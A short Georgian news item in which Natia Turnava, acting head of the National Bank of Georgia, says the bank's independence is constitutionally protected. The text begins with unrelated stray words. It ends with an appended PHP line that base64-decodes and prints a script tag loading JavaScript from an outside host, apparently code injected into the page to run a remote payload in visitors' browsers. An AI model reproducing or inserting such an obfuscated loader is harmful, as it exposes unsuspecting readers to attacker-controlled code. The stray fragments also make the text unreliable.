celsiusi
ავერსი შნაიდერი

ეროვნული ბანკის დამოუკიდებლობა, რომელიც გარანტირებულია არა ნათია თურნავას პირადი ნებით, არამედ კონსტიტუციით და კანონმდებლობით, იქნება ხელშეუხებელი და დაცული, – ამის შესახებ საქართველოს ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებელმა, ვიცე-პრეზიდენტმა ნათია თურნავამ განაცხადა.

მისი თქმით, ჩვეულებრივ რეჟიმში, მანდატის ფარგლებში აგრძელებს თანამშრომლობას ხელისუფლების ყველა შტოსთან.

„რაც შეეხება ეროვნულ ბანკთან დაკავშირებით დისკუსიას, დიახ, იყო აზრთა სხვადასხვაობა. გადაწყდა იმდაგვარად, რომ სტრუქტურულად უზრუნველყოფილია ეროვნული ბანკის მენეჯმენტის სტაბილურობა, რაც, ჩემი აზრით, კარგია როგორც ეროვნული ბანკისთვის, ასევე ჩვენი ქვეყნის საფინანსო სისტემის სტაბილურობისთვის. ჩვეულებრივ რეჟიმში, ჩვენი მანდატის ფარგლებში ვაგრძელებთ თანამშრომლობას ხელისუფლების ყველა შტოსთან. ყველას ვარწმუნებ, რომ ეროვნული ბანკის დამოუკიდებლობა, რომელიც გარანტირებულია არა ნათია თურნავას პირადი ნებით, არამედ კონსტიტუციით და კანონმდებლობით, იქნება ხელშეუხებელი და დაცული“, – განაცხადა თურნავამ.

298
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");